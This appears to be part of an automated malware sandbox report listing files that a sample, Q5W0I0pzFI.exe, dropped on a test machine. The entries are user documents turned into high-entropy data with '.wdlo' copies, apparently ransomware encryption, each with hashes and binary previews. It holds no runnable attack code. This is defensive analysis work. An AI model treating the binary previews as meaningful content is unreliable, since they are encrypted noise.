Preview:	WKXEW..,W.0{.............a2m!..........P......<.R.v.....Y...DB....(....}..\]_wQL..$.a......=...TB0g.Z....)d[vV.".[.O...f.....K./#H.....~.G.$....;V..\|......nK.j.T..w..m..kO...+..q.6?xv..PV.@...C2.i.W..0...e.x.W.$.UlA.......&"...[..m.[.".....!.....?.Av.Y...#.....8(......"(..\~F..%.4.VdO....S....pM=..w.1.sK8..?....L..I .... ..a.G{...1r.<"...p....H..I......~...SI.SL.{.....a...=4.RJS..mro.#....$.:...#....%......\.o\..A...i(.h.4.RB"o9.....[6..u._k. .).HY......./A......X.q.A.>..)s..b.K.U..6Xk......N`.1..b:.r....%.{S.d}.e..kaJ.<.6.W..,.k:7}........T..;l...[s.q..W.......Mr./.@k#....z0.RV..3.V....n.M.b....D..N...K.y&..E...6.h......DK..SX...Q.....H.lp.2P..j[..........{......D....E.....Z.t?......5Z..D...:O...g.Zk.p=...v....\!a}T...E.[v...A...!5..$..is.F..O...f572....l...2....C_24.u.!f..(..C..\%>...?k.c...B...?.}.X..R.<.7.N.gk.].'eK.W.B......m5.....K........k\|.5..xm.J....}...+3...Gza.]l....N..{r.FUE......E...w4u..Fv~....7.[.`)A}..3h

C:\Users\user\Desktop\WKXEWIOTXI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855311758644098
Encrypted:	false
SSDEEP:	24:VLHejBlos3FS2Tn8ANJGIBP4u27qk8xYq+V+u6SiK+xG/XbAYWFbD:JHuloCFSunJ822+fYqM+jSiK+ssYWVD
MD5:	7DA402A7CDD50D51C65CC2C3A350C504
SHA1:	F58D06D4A05FF9A025D8C8E554B58DFD54200906
SHA-256:	C2B644BBBF5F6806667C3821F1C03620F95FCD0B74CF96CDB7D3EF68475B77B3
SHA-512:	EE45343DE71F7F7F6E8BF90B35B0C78D1580896A0381F666AF99658C25D300B7DD49DD8E6711BA2D8C4001612A65A825D9B035A563D0B063166C0AD43D97D5D9
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..,W.0{.............a2m!..........P......<.R.v.....Y...DB....(....}..\]_wQL..$.a......=...TB0g.Z....)d[vV.".[.O...f.....K./#H.....~.G.$....;V..\|......nK.j.T..w..m..kO...+..q.6?xv..PV.@...C2.i.W..0...e.x.W.$.UlA.......&"...[..m.[.".....!.....?.Av.Y...#.....8(......"(..\~F..%.4.VdO....S....pM=..w.1.sK8..?....L..I .... ..a.G{...1r.<"...p....H..I......~...SI.SL.{.....a...=4.RJS..mro.#....$.:...#....%......\.o\..A...i(.h.4.RB"o9.....[6..u._k. .).HY......./A......X.q.A.>..)s..b.K.U..6Xk......N`.1..b:.r....%.{S.d}.e..kaJ.<.6.W..,.k:7}........T..;l...[s.q..W.......Mr./.@k#....z0.RV..3.V....n.M.b....D..N...K.y&..E...6.h......DK..SX...Q.....H.lp.2P..j[..........{......D....E.....Z.t?......5Z..D...:O...g.Zk.p=...v....\!a}T...E.[v...A...!5..$..is.F..O...f572....l...2....C_24.u.!f..(..C..\%>...?k.c...B...?.}.X..R.<.7.N.gk.].'eK.W.B......m5.....K........k\|.5..xm.J....}...+3...Gza.]l....N..{r.FUE......E...w4u..Fv~....7.[.`)A}..3h

C:\Users\user\Desktop\ZTGJILHXQB.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864588579967151
Encrypted:	false
SSDEEP:	24:8w0jYWEvslfnubSXgC29f8WduBzSlwYkWiWECNJRXAsHdcpuxOka+0WFbD:mqvsHQ59f8WdQzSl7sCnRXAs+puYQ0Wt
MD5:	88C61939CB7A8864683EC85154067042
SHA1:	814ECA2EFE40B29DFC8FAF90850D8B5E2E97536C
SHA-256:	2BD45C6DBE30296FD9506B4A99DCB6DEEFF9D91F2755D78ED0CBE8572E2D67F6
SHA-512:	A7A6281A7C0B8D5441F8A02BD5B2F58B8C94C7F40D5FCA03F057442E7668975940F9A1DC22E9C49A8D4C690FF204E0B753582E5C51C7851149EAA93D1D8A117D
Malicious:	false
Reputation:	unknown
Preview:	ZTGJI)..b8...:..J.R.P...D.zL.....#....H.K9n...,.......B;../.#.t..p...B.D....F.U.N.@....>t...5<....1...a.+vG. I.YZj....y.+...(O.9.T..`...+.....0S.A#w;z]xR.....&......M.9..{9..W,..4....S...L.....g_...U..e.(...W.ql...._\|...N....-:...sM.Mj .`Jkz....2..SH. 4e..9...\.S,<R..v..<.e....a.....h :7..a......cc...O..w.E@.#...+..T.C...4..."...7I.5..q........t.>;.~....U1...}.F.y...]...\|:0g..ogY.+..K7./.Bb..........Zz.....'P..S..(n....<.h..d........_..(.?.......E.\C....9....F\|.+Z.=D..I1P...`.Z....A7..d.5.........+.H2.....>..O..H{I.I9...............\|.,..%.jn..3~...G5....._\|..........n...x..?...![V":..nW9D..W.LI.e...oR`?..0.$..}r.A.ID?..o...f.}K.!.?..q._:g`..BX._u.A.).....~....+...x... ..Q.U.}>...)w.....O..........I.gB.s.H;~.N...q.K.a..2W/...*=....Y.y........J..c.M...0...j.s>J....!.&..f..9.B,D..>.&X@&...$SL?.....U.<.e......p..t..^.\..:.].......gL^.O.a..B.....,.....k]....!.9....H.M...q..T.<...oC.y...=.1...e./..."..!.%...94xKu.h..@<.E..#@.MLr.l

C:\Users\user\Desktop\ZTGJILHXQB.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864588579967151
Encrypted:	false
SSDEEP:	24:8w0jYWEvslfnubSXgC29f8WduBzSlwYkWiWECNJRXAsHdcpuxOka+0WFbD:mqvsHQ59f8WdQzSl7sCnRXAs+puYQ0Wt
MD5:	88C61939CB7A8864683EC85154067042
SHA1:	814ECA2EFE40B29DFC8FAF90850D8B5E2E97536C
SHA-256:	2BD45C6DBE30296FD9506B4A99DCB6DEEFF9D91F2755D78ED0CBE8572E2D67F6
SHA-512:	A7A6281A7C0B8D5441F8A02BD5B2F58B8C94C7F40D5FCA03F057442E7668975940F9A1DC22E9C49A8D4C690FF204E0B753582E5C51C7851149EAA93D1D8A117D
Malicious:	false
Reputation:	unknown
Preview:	ZTGJI)..b8...:..J.R.P...D.zL.....#....H.K9n...,.......B;../.#.t..p...B.D....F.U.N.@....>t...5<....1...a.+vG. I.YZj....y.+...(O.9.T..`...+.....0S.A#w;z]xR.....&......M.9..{9..W,..4....S...L.....g_...U..e.(...W.ql...._\|...N....-:...sM.Mj .`Jkz....2..SH. 4e..9...\.S,<R..v..<.e....a.....h :7..a......cc...O..w.E@.#...+..T.C...4..."...7I.5..q........t.>;.~....U1...}.F.y...]...\|:0g..ogY.+..K7./.Bb..........Zz.....'P..S..(n....<.h..d........_..(.?.......E.\C....9....F\|.+Z.=D..I1P...`.Z....A7..d.5.........+.H2.....>..O..H{I.I9...............\|.,..%.jn..3~...G5....._\|..........n...x..?...![V":..nW9D..W.LI.e...oR`?..0.$..}r.A.ID?..o...f.}K.!.?..q._:g`..BX._u.A.).....~....+...x... ..Q.U.}>...)w.....O..........I.gB.s.H;~.N...q.K.a..2W/...*=....Y.y........J..c.M...0...j.s>J....!.&..f..9.B,D..>.&X@&...$SL?.....U.<.e......p..t..^.\..:.].......gL^.O.a..B.....,.....k]....!.9....H.M...q..T.<...oC.y...=.1...e./..."..!.%...94xKu.h..@<.E..#@.MLr.l

C:\Users\user\Documents\CURQNKVOIX.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8403656308726895
Encrypted:	false
SSDEEP:	24:/5K/WRef6ZpN1DmKnsaWPA0Z37UfMbv6fYGdTVokStHE4sc0N4F6y0uWFbD:/IYpHCKnJM5IZSS9iFd0uWVD
MD5:	1F34C799EE1B7CD17A7F6398AFA20CEF
SHA1:	C890F0BC657838A0EFCDA6828A4CDA9A3F55723A
SHA-256:	CAF0ED293CCFC1039D6C8540577A4A7E4C1CF8A3731A9328032809121579E763
SHA-512:	74486A380FF8C1CCBC7DB9FC00513AA05C21E883303C040AB785F494EF8D85873AFE01343E82F66342D3979F81E9C835E0ADAF1D9A45978AC1327A46AB36DCCC
Malicious:	false
Reputation:	unknown
Preview:	CURQN.F...i.2..W./.:....o...yf}.ftH..y.:j.E8....nu.p..fj5.O.~).%...^.~.Xl.4.._....^.....R...5....u.L...Y......WW.....9mB...D.5.....h.. .W.i.PL1.1.?dL...6V[..'..I.f...2......P%2....[..d... .G.........W..@.6wx1...I.lh..Z...w....WI.z.L=.N....ELk.iJ(..=jE.w...0..q...AS.;"P.4.Lvr......g.".wY.4r. Hw.......O.>(L....R..\|6....>....sfn:.h.:..=9V.A+..,.!...j..+......6.#z...!h..]......\|..^t5...\..;`}.F.q..[.r........lX.Z"..p ..`..x.....(....2.. ZW[;p...?.... .s..g...DK.u.y..9..e..?.......S{.M.X6......I...v....U..?./.H.._..F=..nm6.i..p...7.u@....i...C\.i. ...m.fL&...~......_\...~...53jZ..f/.P....e..}...e-j.:...t.+N.3........L&....!w..rq...Ef..0.4#:..[7...~..\|.k\e{a8G..K6.54...{M.F..;...b....G...SJ.o..8Sk.R...X...=...oQ/....U/...q.....1..C.._Wv...a2/..=.^...W....-F.g.;.za..B.f..8. V......5...Do..9.!Wy^..\..[.'.....qw.....L}6s.f.....z;6.M..........~.J#.a..a-E.,....-.x..n..v.`~.L.f.....Q.S......-H.4..zk..".:...oZ....Fn..........0f...P.....

C:\Users\user\Documents\CURQNKVOIX.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8403656308726895
Encrypted:	false
SSDEEP:	24:/5K/WRef6ZpN1DmKnsaWPA0Z37UfMbv6fYGdTVokStHE4sc0N4F6y0uWFbD:/IYpHCKnJM5IZSS9iFd0uWVD
MD5:	1F34C799EE1B7CD17A7F6398AFA20CEF
SHA1:	C890F0BC657838A0EFCDA6828A4CDA9A3F55723A
SHA-256:	CAF0ED293CCFC1039D6C8540577A4A7E4C1CF8A3731A9328032809121579E763
SHA-512:	74486A380FF8C1CCBC7DB9FC00513AA05C21E883303C040AB785F494EF8D85873AFE01343E82F66342D3979F81E9C835E0ADAF1D9A45978AC1327A46AB36DCCC
Malicious:	false
Reputation:	unknown
Preview:	CURQN.F...i.2..W./.:....o...yf}.ftH..y.:j.E8....nu.p..fj5.O.~).%...^.~.Xl.4.._....^.....R...5....u.L...Y......WW.....9mB...D.5.....h.. .W.i.PL1.1.?dL...6V[..'..I.f...2......P%2....[..d... .G.........W..@.6wx1...I.lh..Z...w....WI.z.L=.N....ELk.iJ(..=jE.w...0..q...AS.;"P.4.Lvr......g.".wY.4r. Hw.......O.>(L....R..\|6....>....sfn:.h.:..=9V.A+..,.!...j..+......6.#z...!h..]......\|..^t5...\..;`}.F.q..[.r........lX.Z"..p ..`..x.....(....2.. ZW[;p...?.... .s..g...DK.u.y..9..e..?.......S{.M.X6......I...v....U..?./.H.._..F=..nm6.i..p...7.u@....i...C\.i. ...m.fL&...~......_\...~...53jZ..f/.P....e..}...e-j.:...t.+N.3........L&....!w..rq...Ef..0.4#:..[7...~..\|.k\e{a8G..K6.54...{M.F..;...b....G...SJ.o..8Sk.R...X...=...oQ/....U/...q.....1..C.._Wv...a2/..=.^...W....-F.g.;.za..B.f..8. V......5...Do..9.!Wy^..\..[.'.....qw.....L}6s.f.....z;6.M..........~.J#.a..a-E.,....-.x..n..v.`~.L.f.....Q.S......-H.4..zk..".:...oZ....Fn..........0f...P.....

C:\Users\user\Documents\FENIVHOIKN.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863972956560376
Encrypted:	false
SSDEEP:	24:k4q+4zsiVIUu7+bi5G7Tyf/zD1LUNIuID9CvSY+aK4DGIITKm5V2OJjhWWFbD:a1siV1u7+u5umnVgNZi9RNsSZTTKIjh3
MD5:	B5F35F3090FDE121B4966BB533815AD2
SHA1:	BD549C2673637FE0B9BD3D07819F2549526F3C05
SHA-256:	318C3923C5B736E6D0E9546741EE62CA2DF2B05AEED13B3C4062B53DDB069462
SHA-512:	4992016E772A698E1E62EA211F993AA77E3999B555130B14B07469964710A1F07F92A096A1FFB9B5BB06703A78E7473445E0E1A9B967B1D7EE40FEA22A1E04B6
Malicious:	false
Reputation:	unknown
Preview:	FENIV.^........./...6...y......t....I'..\.X...o......6.@T}..#f....x..C.........<.U....a..UVU@...O.!Ig....".K.x.R;>j..^.2-(...z.I.u..nG..t1g.O..l!:..`..<]\.1.\|.%...6..3,... ..t;..XJq+..fW...i..L._.........G.$......Qm.5.i..q...X].\|!.?[. ..i4B.v.%9V?.....P...U-.4........>..]=.a?.Ww.V;H.....(..vu.5@\|......t......+gb@.i^....e.;'..a..H.g.u...^.......,M..Av.<..r/.6>....c.....U.A.rxP.....B........~.e..o..%.J...z...e......Rg.'e....q...H.m..k.x'.X.x..h.}..8,..26.0.E.~M.\|]...D=..Q.N...X..8:............;k.YA.y....t5..b....ogj...\|+.P..9......y;..5.P..../.... .D....e..0........g.?.e.7..y{.9.,T.....a.o...j8....Q......t,..\...G._...b.6...K.zV.x..._....HY.+$W.Q...{...).e..o.d.....B0.O\.E}....'..1.........=.F{/...^.Wa...Q.i.o."+[5%IJ...\.....7.v\|.oVC..B;M.....X.~vN....N!..+..\|b..3....8.:ts../...d;.....xY!~.ss....+...J..^=.1..&....=8..B'..t....R@.#-c.N.IM...y..`..N..+.....*E 8N..z....%.B..M.G.b...a.\|..8.\.`...._....#..}f.V6k...S.>..dec....~^.(.a....

C:\Users\user\Documents\FENIVHOIKN.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863972956560376
Encrypted:	false
SSDEEP:	24:k4q+4zsiVIUu7+bi5G7Tyf/zD1LUNIuID9CvSY+aK4DGIITKm5V2OJjhWWFbD:a1siV1u7+u5umnVgNZi9RNsSZTTKIjh3
MD5:	B5F35F3090FDE121B4966BB533815AD2
SHA1:	BD549C2673637FE0B9BD3D07819F2549526F3C05
SHA-256:	318C3923C5B736E6D0E9546741EE62CA2DF2B05AEED13B3C4062B53DDB069462
SHA-512:	4992016E772A698E1E62EA211F993AA77E3999B555130B14B07469964710A1F07F92A096A1FFB9B5BB06703A78E7473445E0E1A9B967B1D7EE40FEA22A1E04B6
Malicious:	false
Reputation:	unknown
Preview:	FENIV.^........./...6...y......t....I'..\.X...o......6.@T}..#f....x..C.........<.U....a..UVU@...O.!Ig....".K.x.R;>j..^.2-(...z.I.u..nG..t1g.O..l!:..`..<]\.1.\|.%...6..3,... ..t;..XJq+..fW...i..L._.........G.$......Qm.5.i..q...X].\|!.?[. ..i4B.v.%9V?.....P...U-.4........>..]=.a?.Ww.V;H.....(..vu.5@\|......t......+gb@.i^....e.;'..a..H.g.u...^.......,M..Av.<..r/.6>....c.....U.A.rxP.....B........~.e..o..%.J...z...e......Rg.'e....q...H.m..k.x'.X.x..h.}..8,..26.0.E.~M.\|]...D=..Q.N...X..8:............;k.YA.y....t5..b....ogj...\|+.P..9......y;..5.P..../.... .D....e..0........g.?.e.7..y{.9.,T.....a.o...j8....Q......t,..\...G._...b.6...K.zV.x..._....HY.+$W.Q...{...).e..o.d.....B0.O\.E}....'..1.........=.F{/...^.Wa...Q.i.o."+[5%IJ...\.....7.v\|.oVC..B;M.....X.~vN....N!..+..\|b..3....8.:ts../...d;.....xY!~.ss....+...J..^=.1..&....=8..B'..t....R@.#-c.N.IM...y..`..N..+.....*E 8N..z....%.B..M.G.b...a.\|..8.\.`...._....#..}f.V6k...S.>..dec....~^.(.a....

C:\Users\user\Documents\FENIVHOIKN.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872645333670756
Encrypted:	false
SSDEEP:	24:pGjeElnFBY9MI0vS/bXYzPbaKU/KsHYAqNQEVBosjy1PisQJn7WFbD:pGj77Y50ve7YXaP7HYPgsjyBitJn7WVD
MD5:	182F497329B89CBB27898C812283B4C9
SHA1:	864710E71627F8877B5E3AA9E4568B2858FC180D
SHA-256:	92478A7A53A6BE7BBE7B09DB9A211CBB4B0B51688F6FA6AA4A2C5AA7F6A3FFFA
SHA-512:	EEADDF3116184C5F61481822C1638C70DD3E8FDBDE3DA9AC2C90EB7ADA785BA5CBCA2C4C9A91D86A821279E550D80059EFE1286561B6D291BAB5DDCB34326A3C
Malicious:	false
Reputation:	unknown
Preview:	FENIVJ`8....=.N..0.6......>P..:].JO..:?.(@J.u.o.......j.C...p.e...FB......'f.)..8...Ly.c.....2.....?.....h....d.....[..)Mw..E..1..5.Pxic.:.w}t:.+..?jwRs..u....q.X.i..T..Mk..>....d...T.nX.v..a ..L7-.....&:.nI..d...].q..(nk1.T].1....9.......v>V.&f....'...\x..;...h..B...r..........M....q..{u.Wn.#i..."q...l7......y..$@.....U.E.T.s...J!.u.......Lm.7@`h.`P...AB..@..fV...1C.C.gH..O.S.~f6fA".......H..xy.....Z.KQ..m.Q6.kh~J..#..'.U!..#..0&+.=.7!\._..c........C.....o.wb..+,......8...{...\|b9=.shq..Q=Cv....R.....Z..).qG......"Agv.0..NcV..l<=.-..B......2.Z.a...\|i.[nt...T.....w....'.jFN..{7I...o...3#w#...T.....k...U...<@...xy.<d.m.....G../..N^>..E.r.M...=..;.Cx....h.h..<....,.NE..N+..]Zp!&.W....hY.G.............l5ZQ....$.x...t..'..$0.h.eG.....YR..O.m..Gu..'....G.....Xs.[......-...dQ....TR.O...!8.&.B)..(.\..D..]....!..P...Q.$Y;...$.a.z?L....<.Xc!.&I..Q...H........;u.......n.2I.u...X.n.......}...n..C.Wy.?.~....\|N...%.U.b...~;g..t.f

C:\Users\user\Documents\FENIVHOIKN.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872645333670756
Encrypted:	false
SSDEEP:	24:pGjeElnFBY9MI0vS/bXYzPbaKU/KsHYAqNQEVBosjy1PisQJn7WFbD:pGj77Y50ve7YXaP7HYPgsjyBitJn7WVD
MD5:	182F497329B89CBB27898C812283B4C9
SHA1:	864710E71627F8877B5E3AA9E4568B2858FC180D
SHA-256:	92478A7A53A6BE7BBE7B09DB9A211CBB4B0B51688F6FA6AA4A2C5AA7F6A3FFFA
SHA-512:	EEADDF3116184C5F61481822C1638C70DD3E8FDBDE3DA9AC2C90EB7ADA785BA5CBCA2C4C9A91D86A821279E550D80059EFE1286561B6D291BAB5DDCB34326A3C
Malicious:	false
Reputation:	unknown
Preview:	FENIVJ`8....=.N..0.6......>P..:].JO..:?.(@J.u.o.......j.C...p.e...FB......'f.)..8...Ly.c.....2.....?.....h....d.....[..)Mw..E..1..5.Pxic.:.w}t:.+..?jwRs..u....q.X.i..T..Mk..>....d...T.nX.v..a ..L7-.....&:.nI..d...].q..(nk1.T].1....9.......v>V.&f....'...\x..;...h..B...r..........M....q..{u.Wn.#i..."q...l7......y..$@.....U.E.T.s...J!.u.......Lm.7@`h.`P...AB..@..fV...1C.C.gH..O.S.~f6fA".......H..xy.....Z.KQ..m.Q6.kh~J..#..'.U!..#..0&+.=.7!\._..c........C.....o.wb..+,......8...{...\|b9=.shq..Q=Cv....R.....Z..).qG......"Agv.0..NcV..l<=.-..B......2.Z.a...\|i.[nt...T.....w....'.jFN..{7I...o...3#w#...T.....k...U...<@...xy.<d.m.....G../..N^>..E.r.M...=..;.Cx....h.h..<....,.NE..N+..]Zp!&.W....hY.G.............l5ZQ....$.x...t..'..$0.h.eG.....YR..O.m..Gu..'....G.....Xs.[......-...dQ....TR.O...!8.&.B)..(.\..D..]....!..P...Q.$Y;...$.a.z?L....<.Xc!.&I..Q...H........;u.......n.2I.u...X.n.......}...n..C.Wy.?.~....\|N...%.U.b...~;g..t.f

C:\Users\user\Documents\FENIVHOIKN\FENIVHOIKN.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8355812748130385
Encrypted:	false
SSDEEP:	24:f92J/gzhq+r1LkCVepRSvuC2CErfXNGMREHuRGuTYX0PWLWFnShIcWWFbD:fEqVPpkCVepRauC2hfXNGOEQd605FnS7
MD5:	973C381571F6F48737411315B5F69E17
SHA1:	EBAB73EB35DEC585AF9539F4640A5CC619D4F7E1
SHA-256:	6F9AF5FC0DE0D5E21DEC72B89AE5802C71FACAE5306BBCBB9AEEB5D5DD710E22
SHA-512:	5B5D1AE9A73BC3534C2485000CA2632224150A9BCE9A669BD6FD0FE5B51C1B94F67B3874EA86547D674998FD8D391216A6CB93E94B3D51552922BD01BA646BD6
Malicious:	false
Reputation:	unknown
Preview:	FENIV-...q=.n..M.]&R.....r2\|.21....).Q.;.d.R.4.(I..Ll..%]...N..2.G..o~..........1........C3.!..i.W\..B...j..M..?..j..\.D.W.......J/C..3...NQ.B.eA....~.o....\V.....&@n..-.?=..U'cR.e1,V.......Q[gA..~.2....<...\|"..F...D..J..v.1.G_....(.3........!Id...]<..H.ZJ..F.M.._I.e.uP]..H.>TTq.bj.Z.7..J..O...A..4..?WY.E.Aa..R.....{%..@..[.Y..3..Y.8.\>.V.#b.B..OV.2!n\j..V.S.....0Do6..0P?......!.A.5n.(...P....Z..u.'.p.../.PBv7D.....$...6.S.l.WU....n}[.0.`+.k.Y..J....V..o....@..v....... .1...}.w(.2....W.I. s.......XPv....Oo0...L.#s.w\.\|.(......H..3o....MP..fs.RU..6.rXu..)....U...vh...`}=D...8.!.B...W......$..8..\....W.$=..?A.Y..h#^...yhn..Gq...+.Waf.j.....M,..(.l..^..tN..F..$.I2.{.s..N..M..Yq...S.2%.T@..H....=......j......a.M....d......N.3.5.....{..J..fq...9s.O..X.......k.N'.9.t.Nz.id8....Ka./...}+...vv.V;fj^...q..../.c.7l.....d[j(.^.T$......R.V./b.WFAA4>..c.....In..:^R.....,..C.g..0d...Y..9$..`..;............{5....B...usar,..'.K.&..6....Z..%.194KE$.

C:\Users\user\Documents\FENIVHOIKN\FENIVHOIKN.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8355812748130385
Encrypted:	false
SSDEEP:	24:f92J/gzhq+r1LkCVepRSvuC2CErfXNGMREHuRGuTYX0PWLWFnShIcWWFbD:fEqVPpkCVepRauC2hfXNGOEQd605FnS7
MD5:	973C381571F6F48737411315B5F69E17
SHA1:	EBAB73EB35DEC585AF9539F4640A5CC619D4F7E1
SHA-256:	6F9AF5FC0DE0D5E21DEC72B89AE5802C71FACAE5306BBCBB9AEEB5D5DD710E22
SHA-512:	5B5D1AE9A73BC3534C2485000CA2632224150A9BCE9A669BD6FD0FE5B51C1B94F67B3874EA86547D674998FD8D391216A6CB93E94B3D51552922BD01BA646BD6
Malicious:	false
Reputation:	unknown
Preview:	FENIV-...q=.n..M.]&R.....r2\|.21....).Q.;.d.R.4.(I..Ll..%]...N..2.G..o~..........1........C3.!..i.W\..B...j..M..?..j..\.D.W.......J/C..3...NQ.B.eA....~.o....\V.....&@n..-.?=..U'cR.e1,V.......Q[gA..~.2....<...\|"..F...D..J..v.1.G_....(.3........!Id...]<..H.ZJ..F.M.._I.e.uP]..H.>TTq.bj.Z.7..J..O...A..4..?WY.E.Aa..R.....{%..@..[.Y..3..Y.8.\>.V.#b.B..OV.2!n\j..V.S.....0Do6..0P?......!.A.5n.(...P....Z..u.'.p.../.PBv7D.....$...6.S.l.WU....n}[.0.`+.k.Y..J....V..o....@..v....... .1...}.w(.2....W.I. s.......XPv....Oo0...L.#s.w\.\|.(......H..3o....MP..fs.RU..6.rXu..)....U...vh...`}=D...8.!.B...W......$..8..\....W.$=..?A.Y..h#^...yhn..Gq...+.Waf.j.....M,..(.l..^..tN..F..$.I2.{.s..N..M..Yq...S.2%.T@..H....=......j......a.M....d......N.3.5.....{..J..fq...9s.O..X.......k.N'.9.t.Nz.id8....Ka./...}+...vv.V;fj^...q..../.c.7l.....d[j(.^.T$......R.V./b.WFAA4>..c.....In..:^R.....,..C.g..0d...Y..9$..`..;............{5....B...usar,..'.K.&..6....Z..%.194KE$.

C:\Users\user\Documents\FENIVHOIKN\NEBFQQYWPS.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830475788105015
Encrypted:	false
SSDEEP:	24:Ts1u+o8aNDumGjBo7s4Q6tSWQLQccjSKJsZ/GB0LqL+Xq2y1b3KdqWFbD:Ts1u+ZyukzQ6uL9/GB0uL+6h1b3dWVD
MD5:	48212B0655BEC56A26101BE747C5DF08
SHA1:	1CD617AE440125AB12C674F861B7614170FBE8D4
SHA-256:	BF4DFA59370030E92464AADF184D47FD2B06D48AAD7BDC29EC9778548DF33101
SHA-512:	BD3A5EC5E116E25BB1839C927B4C8ED3F7E6C36AEB4FD8B4EDEAA9D8BEC1B54135AF6BA1619DEF041564BA6A32E86FA255F005110EE035934D43FACAABF777E0
Malicious:	false
Reputation:	unknown
Preview:	NEBFQo..i.'..J[.j...Rq.-.+....4x....Rq.5_.Z.;a...j...>x......'...."..`....0].y.O.N..Y\|.Z.t..1.v.x..\.k.p.d....\|.....Z.v.+..v?D:.}.kLS.\.A..c.....g.)4-.\.....hUT...vS`Z...$p..h.R...$..?...'OC..L\|I(....Q.#0........'..({..3.T..)._.e..h..9....H.O".l...Iafy.S..`.+.'..............s...<.IuB..n...I.......2?z.W......"j...fe..V..&.0.....M......[.c.g...hK.b.\|{ .Gh.X....&....,...V....\|#.S...y..@.l.......\|..7.4.....ha..t>Q@.n.k..dju......:.9sK$t....D;...3o.9k..t..2.I..wY.X%..X...s{R.i..0.(.W$<.7..d..v.q.y....:?...y...\|.9iQ;0"...m.l}._....1..R...cR.+..I_.>,."....Y9D.2.ie....y.r......@..>&..I8...<[\....+H.S.L..2 .H...\|E.3y&.\.<.xtf..s.;,..v..b.)^+.~.)Ecz".2...D=J....`..KN+..$..B....)..s.i.......P/W........*.....:..e..[..Y.n.@.A._P.......$M.....BP?i......._j.k.a.{...N.......w...2....OI....Y...K.0.(.....1iE.4....Y..+[7......>..pn........M.......$...r.o.vk........}..\|,IX...3M.uD.........u......\|..,9.._C5@6/.......u..d.~.b........?1.Q.kN..L.

C:\Users\user\Documents\FENIVHOIKN\NEBFQQYWPS.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830475788105015
Encrypted:	false
SSDEEP:	24:Ts1u+o8aNDumGjBo7s4Q6tSWQLQccjSKJsZ/GB0LqL+Xq2y1b3KdqWFbD:Ts1u+ZyukzQ6uL9/GB0uL+6h1b3dWVD
MD5:	48212B0655BEC56A26101BE747C5DF08
SHA1:	1CD617AE440125AB12C674F861B7614170FBE8D4
SHA-256:	BF4DFA59370030E92464AADF184D47FD2B06D48AAD7BDC29EC9778548DF33101
SHA-512:	BD3A5EC5E116E25BB1839C927B4C8ED3F7E6C36AEB4FD8B4EDEAA9D8BEC1B54135AF6BA1619DEF041564BA6A32E86FA255F005110EE035934D43FACAABF777E0
Malicious:	false
Reputation:	unknown
Preview:	NEBFQo..i.'..J[.j...Rq.-.+....4x....Rq.5_.Z.;a...j...>x......'...."..`....0].y.O.N..Y\|.Z.t..1.v.x..\.k.p.d....\|.....Z.v.+..v?D:.}.kLS.\.A..c.....g.)4-.\.....hUT...vS`Z...$p..h.R...$..?...'OC..L\|I(....Q.#0........'..({..3.T..)._.e..h..9....H.O".l...Iafy.S..`.+.'..............s...<.IuB..n...I.......2?z.W......"j...fe..V..&.0.....M......[.c.g...hK.b.\|{ .Gh.X....&....,...V....\|#.S...y..@.l.......\|..7.4.....ha..t>Q@.n.k..dju......:.9sK$t....D;...3o.9k..t..2.I..wY.X%..X...s{R.i..0.(.W$<.7..d..v.q.y....:?...y...\|.9iQ;0"...m.l}._....1..R...cR.+..I_.>,."....Y9D.2.ie....y.r......@..>&..I8...<[\....+H.S.L..2 .H...\|E.3y&.\.<.xtf..s.;,..v..b.)^+.~.)Ecz".2...D=J....`..KN+..$..B....)..s.i.......P/W........*.....:..e..[..Y.n.@.A._P.......$M.....BP?i......._j.k.a.{...N.......w...2....OI....Y...K.0.(.....1iE.4....Y..+[7......>..pn........M.......$...r.o.vk........}..\|,IX...3M.uD.........u......\|..,9.._C5@6/.......u..d.~.b........?1.Q.kN..L.

C:\Users\user\Documents\FENIVHOIKN\SFPUSAFIOL.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851094055265453
Encrypted:	false
SSDEEP:	24:5P8pdTGRJwOtj5aVuqj5mylRKMTQ8JF4wiL3Bp/qKPAGjPWrpI5QUqh1BLpWFbD:18p8RJJNaVuqjM0KMTQ8JniVp/qKvPW6
MD5:	50EE1C65164060A1DD7E45F11E2FBE89
SHA1:	DACDED0F797B00E6B96D5AA45462C54B60DE741A
